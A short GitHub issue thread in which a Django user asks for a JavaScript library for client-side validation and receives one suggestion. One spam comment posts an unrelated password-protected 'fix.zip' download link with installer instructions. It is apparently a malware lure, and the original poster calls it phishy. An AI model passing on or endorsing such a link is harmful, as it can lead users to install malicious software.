### ISSUE TITLE
Client Validation

### ISSUE THREAD

**Issue by eljeffeg** [python-validators/validators#397]
I'm using validators in a Django application, but I'd also like to validate the client side of the web application.  Do you have any recommendation on a similar Javascript based library to validators that could be used on the client?  Thanks for any advice

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eljeffeg** [comment]
That looks phishy.. no thanks

**Comment by yozachar** [comment]
https://safe.js.org ?

**Comment by eljeffeg** [comment]
Yeah, that has a couple things.  Hoping to get one that does ipv4, ipv6, domains, etc as well.
